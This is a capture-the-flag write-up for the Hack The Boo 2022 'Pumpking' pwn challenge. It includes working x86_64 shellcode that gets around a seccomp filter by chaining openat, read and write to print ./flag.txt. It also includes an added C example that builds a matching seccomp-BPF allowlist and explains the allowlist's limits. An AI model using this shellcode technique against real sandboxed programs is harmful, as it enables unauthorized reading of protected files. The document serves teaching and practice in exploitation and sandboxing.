# Hack The Boo 2022 / Pumpking

###### tags: `CTF`, `PWN`, `writeup`

File link: http://gofile.me/6lhQ2/bU7bepEKk

![](https://i.imgur.com/ueA5sLD.png)

NX is disabled, so we can execute code directly on the stack, but...

![](https://i.imgur.com/ToSjbWK.png)

![](https://i.imgur.com/wj2uVGx.png)

seccomp is enabled and restricts which system calls may be made. Beginners should first understand how the function calls work, then run the tool seccomp-tools.

![](https://i.imgur.com/2l3MmnS.png)

Only read, write, rt_sigreturn, exit and openat are available, so the obvious chain is openat -> read -> write. Look up the Linux system call table for x86_64 and send the shellcode directly:

```
push 0x7478                  # "xt" + NUL padding (imm32 is sign-extended to 8 bytes)
mov rax, 0x742e67616c662f2e  # "./flag.t" (little-endian)
push rax                     # stack now holds "./flag.txt\0"
mov rdi, 0xFFFFFFFFFFFFFF9C  # dfd = AT_FDCWD (-100)
mov rsi, rsp                 # filename
xor rdx, rdx                 # flags = O_RDONLY
xor r10, r10                 # mode
push 257
pop rax                      # SYS_openat = 257
syscall                      # openat(AT_FDCWD, "./flag.txt", O_RDONLY, 0)
mov rdi, rax                 # fd returned by openat
mov rsi, rsp                 # buf (reuses the filename area)
mov edx, 0x100               # count
xor eax, eax                 # SYS_read = 0
syscall                      # read(fd, buf, 0x100)
mov edi, 1                   # fd = stdout
mov rsi, rsp                 # buf
                             # rdx still holds 0x100 from the read
push 1
pop rax                      # SYS_write = 1
syscall                      # write(1, buf, 0x100)
```
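As an added example (not part of the original writeup and not the challenge binary's own code), this is what a seccomp-bpf allowlist with exactly the syscall set reported above looks like when written by hand in C, without libseccomp, so the seccomp-tools dump can be mapped back to the BPF program that produces it. The five permitted syscalls come from the page; the filter layout, the function names (`is_allowed`, `build_filter`, `install_filter`) and the `getpid` demo in `main` are my assumptions. It needs Linux on x86_64.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* The five syscalls seccomp-tools reported as permitted on the challenge
 * binary (taken from the writeup). Everything else is killed. */
static const long allowed[] = { SYS_read, SYS_write, SYS_rt_sigreturn,
                                SYS_exit, SYS_openat };
#define N_ALLOWED (sizeof(allowed) / sizeof(allowed[0]))

/* Plain-C view of the policy, so it can be queried without installing it. */
int is_allowed(long nr)
{
    for (size_t i = 0; i < N_ALLOWED; i++)
        if (allowed[i] == nr)
            return 1;
    return 0;
}

/* Emit a classic-BPF program for the allowlist, in the same shape
 * seccomp-tools prints:  arch check -> load nr -> one JEQ per allowed
 * nr -> KILL ; ALLOW.  Returns the instruction count, 0 if cap is too small. */
size_t build_filter(struct sock_filter *out, size_t cap)
{
    size_t need = 6 + N_ALLOWED;          /* 11 instructions for 5 syscalls */
    if (cap < need)
        return 0;
    size_t n = 0;
    out[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                                            offsetof(struct seccomp_data, arch));
    out[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K,
                                            AUDIT_ARCH_X86_64, 1, 0);
    out[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL); /* wrong arch */
    out[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                                            offsetof(struct seccomp_data, nr));
    for (size_t i = 0; i < N_ALLOWED; i++) {
        /* jt skips the remaining checks and the default KILL, landing on ALLOW */
        out[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K,
                                                (unsigned)allowed[i],
                                                (unsigned char)(N_ALLOWED - i), 0);
    }
    out[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL);  /* default */
    out[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW);
    return n;
}

/* Install the filter in the calling process. Returns 0 on success. */
int install_filter(void)
{
    struct sock_filter insns[32];
    size_t n = build_filter(insns, sizeof insns / sizeof insns[0]);
    if (n == 0)
        return -1;
    struct sock_fprog prog = { .len = (unsigned short)n, .filter = insns };
    /* Required so an unprivileged process may install a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0)
        return -1;
    return 0;
}

/* Demo: the child installs the filter, makes one allowed call, then an
 * unlisted one (getpid) and is killed with SIGSYS. */
int main(void)
{
    fflush(stdout);                        /* don't duplicate buffered output into the child */
    pid_t pid = fork();
    if (pid == 0) {
        if (install_filter() != 0)
            _exit(2);                      /* filter not active here, so exit_group is fine */
        static const char msg[] = "child: write() allowed\n";
        write(1, msg, sizeof msg - 1);     /* permitted */
        syscall(SYS_getpid);               /* not on the list: killed with SIGSYS */
        syscall(SYS_exit, 0);              /* never reached; exit_group is NOT allowed */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSYS)
        printf("parent: child killed by SIGSYS as expected\n");
    else
        printf("parent: unexpected status 0x%x\n", status);
    return 0;
}
```

Build with `gcc -Wall -o allowlist allowlist.c` and run it. Two things worth noticing: a normal process exit goes through `exit_group`, which is not on the list, so the sandboxed child has to call `SYS_exit` explicitly (the shellcode above simply never exits); and an allowlist that keeps `openat`/`read`/`write` does nothing to stop the process from reading and printing any file it already has permission to open, so the flag's file permissions or a mount namespace, not the syscall filter, are what would actually protect it.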